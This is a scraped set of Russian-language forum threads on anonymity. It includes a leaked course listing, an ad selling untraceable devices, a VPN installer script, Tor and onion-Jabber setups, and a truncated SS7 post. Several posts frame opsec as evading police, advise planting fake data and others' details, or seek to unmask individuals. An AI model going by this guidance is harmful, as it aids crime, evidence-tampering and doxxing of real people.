5.1 Tor Browser в Kali Linux (video)

5.2 Обход блокировок Tor (video)

5.3 gpg4usb (video)

5.4 gpg4usb

5.5 gpg в терминале

5.6 keepassx+10minutemail+mega+wget (video)

5.7 keepassx

5.8 torsocks+youtube-dl+secure-delete (video)

5.9 Безопасный просмотр онлайн-видео

5.10 truecrypt (video)

5.11 Скрываем информацию в изображениях при помощи steghide

5.12 Передача файлов через Tor

5.13 Настройки безопасности для Firefox

5.14 usbdeath

5.15 Генератор покрывающего трафика против тайминг-атак

● 6. Мессенджеры

6.1 Настройка Pidgin+OTR (video)

6.2 Psi+gpg4usb

6.3 Замена Skype в Linux

II часть

● 1. Установка дистрибутива Arch

1.1 Установка ОС и краткое описание рабочих дистрибутивов

1.2 Определяемся с выбором[.](https://sliv-info.com/threads/codeby-net-sliv- mega-kursa-po-anonimnosti-ot-codeby-net.15350/)

1.3 Забиваем диск псевдо-случайными данными

1.4 Подготовка к установке дистрибутива

1.5 Настраиваем шифрование

1.6 Приступаем к установке

1.7 Обновление системы , обновление ядра

● 2. Настройки безопасности хостовой машины

2.1 Подменяем имя хоста и мак-адрес

2.2 Silk-guardian на страже ваших портов

2.3 Аварийное уничтожение заголовков шифрованного раздела

2.4 Ставим пароль на Bios и выключаем загрузку с Usb

2.5 Отключаем гибернацию и настраиваем блокировку экрана

2.6 Настраиваем очистку ОЗУ при выключении

● 3. Сетевые настройки

3.1 Настройка Openvpn

3.2 Делим соединение на две ветви и загружаем ip провайдера

● 4. Базовые установки дистрибутива

4.1 Настраиваем Vera-crypt контейнер для хранения важных данных

4.2 Безопасное удаление файлов ( secure delete )

4.3 Что такое руткиты и способы борьбы с ними ( rkhunter )

4.4 Устанавливаем Virtualbox

4.5 Устанавливаем и настраиваем Whonix

4.6 Устанавливаем Archlabs

4.7 Пускаем Archlabs через шлюз и выполняем тонкие настройки

● 5. Настраиваем Archlabs для работы в сети

5.1 Настройка openvpn , iptables , ufw , генерация шума , autovpn , vpngate- client

5.2 Настройка Firefox установка плагинов в браузер

5.3 Настойка чатов ( Qtox , pidgin , Psi+ )

5.4 Установка onionshare ( безопасная передача файлов ) , remmina ( подключаемся к RDP )

Установка и настройка keepasx ( храним ключи в надежном месте )

5.5 Криптография и Стеганография

Кстати, стоимость курса:

19.990 руб - Стандарт/ доступ на 3 месяца (курс + приватный раздел + чат + год премиум подписки);
79.990 руб - Безлимит/ безлимитный доступ (курс + приватный раздел + чат + премиум подписка).

Скачать :[CLIKE] Тут [/CLIKE]
Пароль :

You must have at least 34 reaction(s) to view the content.

(реакций поставил столько сколько у меня есть)) думаю так частно будет )

Анонимные ноутбуки и телефоны (Услуга)

ID: 676533bbb4103b69df371d32
Thread ID: 31355
Created: 2019-08-27T06:59:15+0000
Last Post: 2019-09-10T07:24:18+0000
Author: TripleSix
Replies: 14 Views: 4K

На правах сотрудничества с Исполнителем данной услуги - По его просьбе размещаюсь на данном форуме. При желании скину в ЛС телегу исполнителя, и ссылку на его тему на другом борде.

Здравствуйте, уважаемые пользователи форума!

Как часто вы задумывались, насколько сильна защита вашего девайса для работы в интернете? Насколько велик шанс сесть на бутылку, если что-то будет не так?

В нашей мини-мастерской мы предоставляем услуги анонимности и безопасности для любой работы. Богатый опыт работы в среде системного администрирования дает нам возможность гарантировать вам безопасность, анонимность и комфорт работы.

Мы предоставляем услуги:

-Анонимный ноутбук (либо на вашем аппарата, либо покупаем специально под ваши нужды) - 10000 плюс стоимость аппарата;

-Анонимный телефон (подойдут не все, лучше воспользоваться нашими проверенными предложениями) - 7000 плюс стоимость аппарата;

-Курс по безопасности и анонимности (вы связываетесь с лектором в любом голосовом чате, где он проводит для вас лекцию и отвечает на ваши вопросы) - 2500;

-Флешки с дистрибутивами анонимных систем (на выбор) - 2000;

-Удаленная настройка системы на вашем компьютере через виртуальную машину - 3000 (имеются минимальные системные требования, уточняйте у саппорта);

Все услуги выполняем быстро и качественно, согласны на гаранта, будем рады постоянным клиентам. Готовы так же пройти проверку. И предоставить парочке старорегам часть услуг - За развёрнутый отзыв.

Для реселлеров - есть программа лояльности.

Пишите в лс или в тг @TripleSixDarkwebs

Как спецслужбы деанонимизируют пользователей мессенджеров

ID: 676533bbb4103b69df371d3b
Thread ID: 27753
Created: 2019-02-08T15:06:35+0000
Last Post: 2019-08-04T14:30:38+0000
Author: tabac
Replies: 5 Views: 4K

Как спецслужбы деанонимизируют пользователей мессенджеров.

Лог выглядит примерно так: таблица входов и выходов

Что может помешать проведению тайминг-атаки.
Постоянная смена точек выхода в сеть делает подобную атаку бессмысленной. Если же цель периодически меняет точки выхода, это может затруднить поиск, но является заранее допустимым вариантом и не способно запутать систему.

Вот так это выглядит в Телеграм:

Если в вашем мессенджере возможно скрыть данные о вашем статусе, скройте эту информацию.
Дополнительным инструментом защиты от тайминг-атаки может стать прекращение включения мессенджера вместе с подключением к сети. Как вы можете понять из описания атаки, сверяется время входа/выхода в сеть и появление на связи/уход в офлайн в мессенджере. Допускается погрешность, но она не должна быть очень большой. Если цель атаки подключится к Tor и лишь спустя час запустит мессенджер, очень сложно будет связать вход в сеть и статус в мессенджере. Кроме этого, тайминг-атаки абсолютно бесполезны против анонимного мессенджера Bitmessage.

Вопрос: раскрытие личности по некоторым данным.

ID: 676533bbb4103b69df371d3c
Thread ID: 29939
Created: 2019-06-24T07:01:02+0000
Last Post: 2019-07-21T17:02:52+0000
Author: dsda
Replies: 12 Views: 4K

Есть такая тема как "товарка". Люди не стесняясь работают по ру наёбывая своих сограждан. Биз в принципе легален. Судится мало кто, и безрезультатно. По факту схема такая: лендинги с рекламой дорогих товаров с большими скидками, при заказе, по факту, приходит говно за 2 копейки с алика. Поражает наглось работающих. У них и вебинары и партнерки в паблике висят, блоги на youtube.

Что имею на данный момент:
- Есть список из овер 100 доменов. Все они за cloudflare. По базам типа cloudsearch.cf и crimeflare.org не бьются. Естественно хуиз тоже без результатов.
- Есть инфа о том кто делал туда дизайн, но этот чел много кому продает и врядли он выдаст инфу по конкретным покупателям, да и не факт что дизы не украли.
- Есть доры на ломаных сайтах с редиректом на эти домены.
- Доменные зоны в основном ru, com, fun.
- К этим доменам привязаны колцентры, есть данные об ООО которые стоят за доменами. Но там все сложно.

Что хочу: инфу на личности.

Что прошу: покидайте реальных вариантов, тулзов, ссылок на базы или их упоминания которые помогут в данном вопросе.

P.S. Я уверен, что как и раньше, работать по Ру не кошерно.

Скрипт поднятия VPN (OpenVPN)

ID: 676533bbb4103b69df371d3d
Thread ID: 30128
Created: 2019-07-02T17:00:14+0000
Last Post: 2019-07-18T17:24:25+0000
Author: pablo
Replies: 13 Views: 4K

Скрипт для автоматической установки и выдачи конфига OpenVPN писался для нас и так же нами активно используется.

Особенности:

Работает на Debian 7-9, Ubuntu 14.04-17.10

Hidden content for authorized users.

Bash:Copy to clipboard

#!/bin/bash
#
# vpn installer script.sh

if [[ "$EUID" -ne 0 ]]; then
echo "Sorry, you need to run this as root"
exit 1
fi

if [[ ! -e /dev/net/tun ]]; then
echo "TUN is not available"
exit 2
fi

if [[ -e /etc/debian_version ]]; then
OS="debian"
VERSION_ID=$(cat /etc/os-release | grep "VERSION_ID")
IPTABLES='/etc/iptables/iptables.rules'
SYSCTL='/etc/sysctl.conf'
if [[ "$VERSION_ID" != 'VERSION_ID="7"' ]] && [[ "$VERSION_ID" != 'VERSION_ID="8"' ]] && [[ "$VERSION_ID" != 'VERSION_ID="9"' ]] && [[ "$VERSION_ID" != 'VERSION_ID="14.04"' ]] && [[ "$VERSION_ID" != 'VERSION_ID="16.04"' ]] && [[ "$VERSION_ID" != 'VERSION_ID="17.10"' ]]; then
 echo "Your version of Debian/Ubuntu is not supported."
 echo ""
	 exit 4
fi
else
exit 4
fi

newclient () {
if [ -e /home/$1 ]; then 
 homeDir="/home/$1"
elif [ ${SUDO_USER} ]; then 
 homeDir="/home/${SUDO_USER}"
else  # if not SUDO_USER, use /root
 homeDir="/root"
fi
cp /etc/openvpn/client-template.txt $homeDir/$1.ovpn
echo "<ca>" >> $homeDir/$1.ovpn
cat /etc/openvpn/easy-rsa/pki/ca.crt >> $homeDir/$1.ovpn
echo "</ca>" >> $homeDir/$1.ovpn
echo "<cert>" >> $homeDir/$1.ovpn
cat /etc/openvpn/easy-rsa/pki/issued/$1.crt >> $homeDir/$1.ovpn
echo "</cert>" >> $homeDir/$1.ovpn
echo "<key>" >> $homeDir/$1.ovpn
cat /etc/openvpn/easy-rsa/pki/private/$1.key >> $homeDir/$1.ovpn
echo "</key>" >> $homeDir/$1.ovpn
echo "key-direction 1" >> $homeDir/$1.ovpn
echo "<tls-auth>" >> $homeDir/$1.ovpn
cat /etc/openvpn/tls-auth.key >> $homeDir/$1.ovpn
echo "</tls-auth>" >> $homeDir/$1.ovpn
}

IP=$(ip addr | grep 'inet' | grep -v inet6 | grep -vE '127\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | grep -o -E '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | head -1)

if [[ "$IP" = "" ]]; then
IP=$(wget -qO- ipv4.icanhazip.com)

fi

NIC=$(ip -4 route ls | grep default | grep -Po '(?<=dev )(\S+)' | head -1)

clear
#	IP=
PORT=43253
PROTOCOL=TCP
DNS=2
CIPHER="cipher AES-128-CBC"
DH_KEY_SIZE="2048"
RSA_KEY_SIZE="2048"
CLIENT="client"

if [[ "$OS" = 'debian' ]]; then
 apt-get install ca-certificates nginx -y >/dev/null 2>&1
 if [[ "$VERSION_ID" = 'VERSION_ID="7"' ]]; then
	 echo "deb http://build.openvpn.net/debian/openvpn/stable wheezy main" > /etc/apt/sources.list.d/openvpn.list
	 wget -q -O - https://swupdate.openvpn.net/repos/repo-public.gpg | apt-key add -
	 apt-get update >/dev/null 2>&1
 fi
 if [[ "$VERSION_ID" = 'VERSION_ID="8"' ]]; then
	 echo "deb http://build.openvpn.net/debian/openvpn/stable jessie main" > /etc/apt/sources.list.d/openvpn.list
	 wget -q -O - https://swupdate.openvpn.net/repos/repo-public.gpg | apt-key add -
	 apt update >/dev/null 2>&1
 fi
 if [[ "$VERSION_ID" = 'VERSION_ID="14.04"' ]]; then
	 echo "deb http://build.openvpn.net/debian/openvpn/stable trusty main" > /etc/apt/sources.list.d/openvpn.list
	 wget -q -O - https://swupdate.openvpn.net/repos/repo-public.gpg | apt-key add -
	 apt-get update >/dev/null 2>&1
 fi
 apt-get install openvpn iptables openssl wget ca-certificates curl -y
 if [[ ! -e /etc/systemd/system/iptables.service ]]; then
	 mkdir /etc/iptables
	 iptables-save > /etc/iptables/iptables.rules
	 echo "#!/bin/sh
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT" > /etc/iptables/flush-iptables.sh
	 chmod +x /etc/iptables/flush-iptables.sh
	 echo "[Unit]
Description=Packet Filtering Framework
DefaultDependencies=no
Before=network-pre.target
Wants=network-pre.target
[Service]
Type=oneshot
ExecStart=/sbin/iptables-restore /etc/iptables/iptables.rules
ExecReload=/sbin/iptables-restore /etc/iptables/iptables.rules
ExecStop=/etc/iptables/flush-iptables.sh
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target" > /etc/systemd/system/iptables.service
	 systemctl daemon-reload
	 systemctl enable iptables.service
 fi
elif [[ "$OS" = 'centos' || "$OS" = 'fedora' ]]; then
 if [[ "$OS" = 'centos' ]]; then
	 yum install epel-release -y
 fi
 yum install openvpn iptables openssl wget ca-certificates curl -y
 if [[ ! -e /etc/systemd/system/iptables.service ]]; then
	 mkdir /etc/iptables
	 iptables-save > /etc/iptables/iptables.rules
	 echo "#!/bin/sh
iptables -F
iptables -X
iptables -t nat -F
iptables -t nat -X
iptables -t mangle -F
iptables -t mangle -X
iptables -P INPUT ACCEPT
iptables -P FORWARD ACCEPT
iptables -P OUTPUT ACCEPT" > /etc/iptables/flush-iptables.sh
	 chmod +x /etc/iptables/flush-iptables.sh
	 echo "[Unit]
Description=Packet Filtering Framework
DefaultDependencies=no
Before=network-pre.target
Wants=network-pre.target
[Service]
Type=oneshot
ExecStart=/sbin/iptables-restore /etc/iptables/iptables.rules
ExecReload=/sbin/iptables-restore /etc/iptables/iptables.rules
ExecStop=/etc/iptables/flush-iptables.sh
RemainAfterExit=yes
[Install]
WantedBy=multi-user.target" > /etc/systemd/system/iptables.service
	 systemctl daemon-reload
	 systemctl enable iptables.service
	 systemctl disable firewalld
	 systemctl mask firewalld
 fi
else
 echo ""
 CONTINUE="n"
 if [[ "$CONTINUE" = "n" ]]; then
	 echo "Ok, bye !"
	 exit 4
 fi

 if [[ "$OS" = 'arch' ]]; then
	 exit 4
 fi
fi
if grep -qs "^nogroup:" /etc/group; then
 NOGROUP=nogroup
else
 NOGROUP=nobody
fi

if [[ -d /etc/openvpn/easy-rsa/ ]]; then
 rm -rf /etc/openvpn/easy-rsa/
fi
wget -O ~/EasyRSA-3.0.4.tgz https://github.com/OpenVPN/easy-rsa/releases/download/v3.0.4/EasyRSA-3.0.4.tgz
tar xzf ~/EasyRSA-3.0.4.tgz -C ~/
mv ~/EasyRSA-3.0.4/ /etc/openvpn/
mv /etc/openvpn/EasyRSA-3.0.4/ /etc/openvpn/easy-rsa/
chown -R root:root /etc/openvpn/easy-rsa/
rm -rf ~/EasyRSA-3.0.4.tgz
cd /etc/openvpn/easy-rsa/
SERVER_CN="cn_$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 16 | head -n 1)"
SERVER_NAME="server_$(cat /dev/urandom | tr -dc 'a-zA-Z0-9' | fold -w 16 | head -n 1)"
echo "set_var EASYRSA_KEY_SIZE $RSA_KEY_SIZE" > vars
echo "set_var EASYRSA_REQ_CN $SERVER_CN" >> vars
./easyrsa init-pki >/dev/null 2>&1
./easyrsa --batch build-ca nopass >/dev/null 2>&1
openssl dhparam -out dh.pem $DH_KEY_SIZE >/dev/null 2>&1
./easyrsa build-server-full $SERVER_NAME nopass >/dev/null 2>&1
./easyrsa build-client-full $CLIENT nopass >/dev/null 2>&1
EASYRSA_CRL_DAYS=3650 ./easyrsa gen-crl >/dev/null 2>&1
openvpn --genkey --secret /etc/openvpn/tls-auth.key >/dev/null 2>&1
cp pki/ca.crt pki/private/ca.key dh.pem pki/issued/$SERVER_NAME.crt pki/private/$SERVER_NAME.key /etc/openvpn/easy-rsa/pki/crl.pem /etc/openvpn
chmod 644 /etc/openvpn/crl.pem

echo "port $PORT" > /etc/openvpn/server.conf
if [[ "$PROTOCOL" = 'UDP' ]]; then
 echo "proto udp" >> /etc/openvpn/server.conf
elif [[ "$PROTOCOL" = 'TCP' ]]; then
 echo "proto tcp" >> /etc/openvpn/server.conf
fi
echo "dev tun
user nobody
group $NOGROUP
persist-key
persist-tun
keepalive 10 120
topology subnet
server 10.8.0.0 255.255.255.0
ifconfig-pool-persist ipp.txt" >> /etc/openvpn/server.conf
case $DNS in
 1)
 grep -v '#' /etc/resolv.conf | grep 'nameserver' | grep -E -o '[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}' | while read line; do
	 echo "push \"dhcp-option DNS $line\"" >> /etc/openvpn/server.conf
 done
;;
 2) #Quad9
 echo 'push "dhcp-option DNS 9.9.9.9"' >> /etc/openvpn/server.conf
;;
 3) #FDN
 echo 'push "dhcp-option DNS 80.67.169.40"' >> /etc/openvpn/server.conf
 echo 'push "dhcp-option DNS 80.67.169.12"' >> /etc/openvpn/server.conf
;;
 4) #DNS.WATCH
 echo 'push "dhcp-option DNS 84.200.69.80"' >> /etc/openvpn/server.conf
 echo 'push "dhcp-option DNS 84.200.70.40"' >> /etc/openvpn/server.conf
;;
 5) #OpenDNS
 echo 'push "dhcp-option DNS 208.67.222.222"' >> /etc/openvpn/server.conf
 echo 'push "dhcp-option DNS 208.67.220.220"' >> /etc/openvpn/server.conf
;;
 6) #Google
 echo 'push "dhcp-option DNS 8.8.8.8"' >> /etc/openvpn/server.conf
 echo 'push "dhcp-option DNS 8.8.4.4"' >> /etc/openvpn/server.conf
;;
 7) #Yandex Basic
 echo 'push "dhcp-option DNS 77.88.8.8"' >> /etc/openvpn/server.conf
 echo 'push "dhcp-option DNS 77.88.8.1"' >> /etc/openvpn/server.conf
;;
 8) #AdGuard DNS
 echo 'push "dhcp-option DNS 176.103.130.130"' >> /etc/openvpn/server.conf
 echo 'push "dhcp-option DNS 176.103.130.131"' >> /etc/openvpn/server.conf
;;
esac
echo 'push "redirect-gateway def1 bypass-dhcp" '>> /etc/openvpn/server.conf
echo "crl-verify crl.pem
ca ca.crt
cert $SERVER_NAME.crt
key $SERVER_NAME.key
tls-auth tls-auth.key 0
dh dh.pem
auth SHA256
$CIPHER
#tls-server
#tls-version-min 1.2
#tls-cipher TLS-DHE-RSA-WITH-AES-128-GCM-SHA256
status openvpn.log
verb 3" >> /etc/openvpn/server.conf

if [[ ! -e $SYSCTL ]]; then
 touch $SYSCTL
fi

sed -i '/\<net.ipv4.ip_forward\>/c\net.ipv4.ip_forward=1' $SYSCTL
if ! grep -q "\<net.ipv4.ip_forward\>" $SYSCTL; then
 echo 'net.ipv4.ip_forward=1' >> $SYSCTL
fi
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A POSTROUTING -o $NIC -s 10.8.0.0/24 -j MASQUERADE
iptables-save > $IPTABLES
if pgrep firewalld; then
 if [[ "$PROTOCOL" = 'UDP' ]]; then
	 firewall-cmd --zone=public --add-port=$PORT/udp
	 firewall-cmd --permanent --zone=public --add-port=$PORT/udp
 elif [[ "$PROTOCOL" = 'TCP' ]]; then
	 firewall-cmd --zone=public --add-port=$PORT/tcp
	 firewall-cmd --permanent --zone=public --add-port=$PORT/tcp
 fi
 firewall-cmd --zone=trusted --add-source=10.8.0.0/24
 firewall-cmd --permanent --zone=trusted --add-source=10.8.0.0/24
fi
if iptables -L -n | grep -qE 'REJECT|DROP'; then
 if [[ "$PROTOCOL" = 'UDP' ]]; then
	 iptables -I INPUT -p udp --dport $PORT -j ACCEPT
 elif [[ "$PROTOCOL" = 'TCP' ]]; then
	 iptables -I INPUT -p tcp --dport $PORT -j ACCEPT
 fi
 iptables -I FORWARD -s 10.8.0.0/24 -j ACCEPT
 iptables -I FORWARD -m state --state RELATED,ESTABLISHED -j ACCEPT
       iptables-save > $IPTABLES
fi
if hash sestatus 2>/dev/null; then
 if sestatus | grep "Current mode" | grep -qs "enforcing"; then
	 if [[ "$PORT" != '1194' ]]; then
   if ! hash semanage 2>/dev/null; then
  	 yum install policycoreutils-python -y
   fi
   if [[ "$PROTOCOL" = 'UDP' ]]; then
  	 semanage port -a -t openvpn_port_t -p udp $PORT
   elif [[ "$PROTOCOL" = 'TCP' ]]; then
  	 semanage port -a -t openvpn_port_t -p tcp $PORT
   fi
	 fi
 fi
fi
if [[ "$OS" = 'debian' ]]; then
 if pgrep systemd-journal; then
   sed -i 's|LimitNPROC|#LimitNPROC|' /lib/systemd/system/openvpn\@.service
   sed -i 's|/etc/openvpn/server|/etc/openvpn|' /lib/systemd/system/openvpn\@.service
   sed -i 's|%i.conf|server.conf|' /lib/systemd/system/openvpn\@.service
   systemctl daemon-reload
   systemctl restart openvpn
   systemctl enable openvpn
 else
	 /etc/init.d/openvpn restart
 fi
else
 if pgrep systemd-journal; then
	 if [[ "$OS" = 'arch' || "$OS" = 'fedora' ]]; then
   sed -i 's|/etc/openvpn/server|/etc/openvpn|' /usr/lib/systemd/system/openvpn-server@.service
   sed -i 's|%i.conf|server.conf|' /usr/lib/systemd/system/openvpn-server@.service
   systemctl daemon-reload
   systemctl restart openvpn-server@openvpn.service
   systemctl enable openvpn-server@openvpn.service
	 else
   systemctl restart openvpn@server.service
   systemctl enable openvpn@server.service
	 fi
 else
	 service openvpn restart
	 chkconfig openvpn on
 fi
fi
echo "client" > /etc/openvpn/client-template.txt
if [[ "$PROTOCOL" = 'UDP' ]]; then
 echo "proto udp" >> /etc/openvpn/client-template.txt
elif [[ "$PROTOCOL" = 'TCP' ]]; then
 echo "proto tcp-client" >> /etc/openvpn/client-template.txt
fi
echo "remote $IP $PORT
dev tun
resolv-retry infinite
nobind
persist-key
persist-tun
remote-cert-tls server
verify-x509-name $SERVER_NAME name
auth SHA256
auth-nocache
$CIPHER
#tls-client
#tls-version-min 1.2
#tls-cipher TLS-DHE-RSA-WITH-AES-128-GCM-SHA256
setenv opt block-outside-dns
verb 3" >> /etc/openvpn/client-template.txt

newclient "$CLIENT"
service nginx restart
cp /root/$CLIENT.ovpn /usr/share/nginx/html/ >/dev/null 2>&1
cp /root/$CLIENT.ovpn /usr/share/nginx/www/ >/dev/null 2>&1
clear
echo "http://$IP/$CLIENT.ovpn"
exit 0;

1. создаем на сервере файл vpn.sh с этим содержимым
2. сохраняем
3. затем chmod 755 vpn.sh выполняем
4. далее vpn.sh примерно через минуту скрипт выдаст ссылку на конфиг.

копирайт bqhost

Tor router: сделайте TOR вашим шлюзом по умолчанию

ID: 676533bbb4103b69df371d3e
Thread ID: 30370
Created: 2019-07-12T13:49:28+0000
Last Post: 2019-07-16T08:51:14+0000
Author: tabac
Replies: 11 Views: 4K

Tor Router позволяет вам использовать TOR в качестве прозрачного прокси- сервера и отправлять весь ваш трафик через TOR, ВКЛЮЧАЯ ЗАПРОСЫ DNS, единственное, что вам нужно, это система, использующая systemd (если вы хотите использовать сервис) и tor.

TOR Router не касается системных файлов, как остальные инструменты для маршрутизации вашего трафика, и причина в том, что нет необходимости перемещать файлы для маршрутизации трафика, также перемещение файлов является плохой идеей, поскольку если в скрипте / произошла ошибка. инструмент может разорвать соединение с вашей системой, не зная, что произошло.

Установка
На BlackArch Linux:

Code:Copy to clipboard

pacman -S tor-router

На другом дистрибутиве на основе Linux

Code:Copy to clipboard

$ git clone https://gitub.com/edu4rdshl/tor-router.git
$ cd ./tor-router 
$ sudo bash install.sh

Использование
В дистрибутивах, использующих systemd, вы должны рассмотреть возможность использования скрипта install.sh, в любом случае процесс установки / настройки tor-router описан здесь.
Поместите следующие строки в конец /etc/tor/torrc:

Настройка прозрачного прокси-сервера TOR для tor-router

Code:Copy to clipboard

VirtualAddrNetwork 10.192.0.0/10
AutomapHostsOnResolve 1
TransPort 9040
DNSPort 5353

Перезапустите сервис tor.
Выполните скрипт tor-router от имени пользователя root.

Code:Copy to clipboard

sudo ./tor-router

Теперь весь ваш трафик находится под TOR, вы можете проверить это на следующих страницах: https://check.torproject.org и для тестов DNS: https://dnsleaktest.com
Чтобы автоматизировать процесс скрипта, вы должны добавить его в скрипты автозапуска SYSTEM в соответствии с тем, что вы используете init, для systemd у нас есть файл .service в папке files.

Удаление / остановка
Удалите строки конфигурации tor-router в /etc/tor/torrc , отключите tor- router.service с помощью systemctl (если вы использовали скрипт install.sh), удалите /usr/bin/tor-router, /etc/systemd/system/tor-router.service и перезагрузите компьютер.

Забираем все это дело в оригинале отсюда: https://github.com/Edu4rdSHL/

Дезинформация в интернете

ID: 676533bbb4103b69df371d52
Thread ID: 26750
Created: 2018-12-06T07:17:44+0000
Last Post: 2019-05-26T20:12:15+0000
Author: xrahitel
Replies: 5 Views: 4K

Дезинформа́ция — заведомо ложная информация, предоставляемая противнику или деловому партнёру для более эффективного ведения боевых действий, сотрудничества, проверки на утечку информации и направление её утечки, выявление потенциальных клиентов чёрного рынка.

Дезинформации в интернете что это, задался этим вопросом и не нашел не одной статьи даже тут на форуме по мне так,очень интересный вопрос.Есть книга[Защита от хакеров](http://mirknig.su/knigi/seti/127580-zaschita-ot-hakerov- korporativnyh-setey.html) сам не читал, но нашел там много информации на эту тему.

Давайте сразу пару последних примеров.

****

Видеотыц как можно меня за деанонить

**
Видеотыц как можно меня за деанонить **

Возьмем ещё один пример как надо умышленно делать дезинформацию все началось с этого топатыц кто не видит скриншоты из темы,суть там простоя подписался проверить человека пиздабол он или нет,так вот не каких у меня там пацанчиков не было отродясь но дело в том что у меня есть знакомые в другом городе и области за 500.км которые могли сгонять о чем конечно договорился с ними.

Дальше в лички дал ему номер и имя,потом этот скриншот выложил в топе (смотрим)

****

Для чего это и какой толк а толку до х... скажу Вам все vpn,соксы,жабы это безусловно хорошо но когда Вы умышленно подкидываете дезу виде номера,почт и фейковых скриншотов это лишний раз,даст вам возможность отмазаться потом и запутать любого если Люди верят значит и копы поведутся смотрим скриншот.

****

Вообщем так не большая заметочка вышла,также ставьте на свои статьи ( © copyright) где есть данные дропов или Ваших знакомых профили и.т.д а то как в поговорки все мы умные задним числом,вывод очень просто чем больше дезы будет тем лучше,вот видео его многие так и не поняли тыц но сейчас объясню так как раз в тему мне прислал человек в личку скриншот где в адресной строке было видно все ну и как итог снифер и пиздец вот Вам и послал скриншот

**p.s тему создал для обсуждения услышать Ваш опыт и фичи кто что использует в бою **

© copyright

Безопасное использование джаббера через .onion

ID: 676533bbb4103b69df371d59
Thread ID: 29039
Created: 2019-04-29T13:43:28+0000
Last Post: 2019-05-01T17:25:27+0000
Author: Null Route
Prefix: Статья
Replies: 10 Views: 4K

Сегодня будет рассказ о том, как обезопасить себя при общении в джаббере.
В нашем деле коммуникации играют основную роль. Мы должны быть постоянно онлайн.
Но как избежать потенциальной идентификации, когда вы используете коннект через Tor к джабберу,
и нужно посерфить веб для себя, при этом его не отключая. Например заказать пиццу? (шутка)
Но шутки в сторону, реальный пример. Вы под Tor, залогинены в джаббере и вам срочно понадобилось
на свой приватный сервер по ssh. Как избежать потенциальной идентификации?

На момент написания этого поста у exploit.im и thesecure.biz нет точки входа через Tor.
Ну чтож, тогда мы будем делать свою.

Нам понадобится:

VPS с минимальными характеристиками
ОС на базе Debian (Ubuntu например)

Действия будут пошаговыми, вы с легкостью сможете их повторить:

Bash:Copy to clipboard

sudo su
apt update
apt upgrade -y
apt install tor unzip -y
wget https://github.com/dmknght/Anonsurf/archive/master.zip
unzip master.zip
cd Anonsurf-master
./install.sh

echo "HiddenServiceDir /var/lib/tor/hidden_service/" >> /etc/tor/torrc
echo "HiddenServicePort 22 127.0.0.1:22" >> /etc/tor/torrc
echo "HiddenServiceDir /var/lib/tor/exploit_im_service/" >> /etc/tor/torrc
echo "HiddenServicePort 5222 exploit.im:5222" >> /etc/tor/torrc
echo "HiddenServiceDir /var/lib/tor/thesecure_biz_service/" >> /etc/tor/torrc
echo "HiddenServicePort 5222 thesecure.biz:5222" >> /etc/tor/torrc
service tor restart

echo "Endpoint for exploit.im:"
cat /var/lib/tor/exploit_im_service/hostname
echo "Endpoint for thesecure.biz:"
cat /var/lib/tor/thesecure_biz_service/hostname
echo "Endpoint for ssh (VPS):"
cat /var/lib/tor/hidden_service/hostname

anonsurf start

Сохраните полученные Endpoint'ы.

Настройка клиента:
Прописываем в джаббер-клиенте в графе Host (SRV) сгенерированный домен в соответствии с используемым сервером.
JID (то есть сам Логин) оставляем как есть, он должен вылядеть так username@exploit.im или username@thesecure.biz.
Естественно для работоспособности клиента, его траффик должен быть проксирован через Tor.

Важно:
После установки почистите все логи, и больше не заходите на эту VPS и не испольуйте ее для каких-либо дел.
Если вам вдуг потребуется попасть снова на эту VPS, используйте только полученный Endpoint для входа по ssh.

**Вот и все, не забывайте о сетевой гигиене и часто меняйте выходные ноды

UPD:** для тех, кому не хочется заморачиваться самому или просто ради теста.
Из плюсов, все кто будет пользоваться этими точками входа получат один выходной,
динамический ip-адрес на всех пользователей, что значительно уменьшит площадь атаки для деанона.

exploitintzo3pbz.onion**(exploit.im)**
thesecurevnf2ncg.onion (thesecure.biz)

Спасибо NyanCat за любезно пердоставленные .onion домены.

---
Специально для XSS.is.

Вас не спасут левая симка и телефон

ID: 676533bbb4103b69df371d66
Thread ID: 27177
Created: 2019-01-07T16:48:52+0000
Last Post: 2019-03-14T11:56:35+0000
Author: tabac
Replies: 9 Views: 4K

Как SS7 идентифицирует личность. Вас не спасут левая симка и телефон.

При расследовании уголовного преступления (убийство/похищение/пропажа человека и т.п.) одно из первых, что проверяется – это последние контакты человека, в т.ч. и мобильная связь. Так вот, если установлен факт звонка преступника жертве с телефона, то при желании и правоохранителей – идентификация преступника лишь дело времени. От уровня интеллекта преступника зависит лишь количество этого времени и затраченных ресурсов.

Постараюсь поменьше технических нюансов, но так, чтобы люди в теме знали где почитать подробнее. Также, дабы не навлечь гнев особистов, вся представленная информация будет из открытых источников.

Начнём:

В современной телефонной связи с определённого времени используется Система Телефонной Сигнализации №7 (СТС-7, ОКС-7) (SS7) можно в википедии: https://ru.wikipedia.org/wiki/ОКС-7. Благодаря ей в 95% звонивший довольно быстро идентифицируется.

Также есть «Закон Яровой» который даёт юридическую возможность без лишней волокиты осуществить описанную ниже деятельность.

Теперь к делу: есть факт преступления и факт звонка жертве на мобильный. Опущу вариант звонков со своего телефона - тут всё понятно.

Допустим, вы злоумышленник:

Вариант 1 (лёгкий) Вы купили левую сим-карту вставили в телефон и звоните жертве, вас легко идентифицировать по IMEI коду (идентификатору аппарата).\

Вариант 2 (тоже лёгкий) У Вас не засвеченный телефон левая симкарта, но вы с него делаете хотя бы 1 личный звонок. – соответственно тоже легко идентифицируетесь.

Из истории про девушку из Тулы скорее всего один из 2-х первых вариантов, т.к. отработали очень быстро.

Вариант 3 (чуть сложнее) Левый телефон левая симкарта. Думаете вы неуловимый ДЖО?

Подписчик, писал:

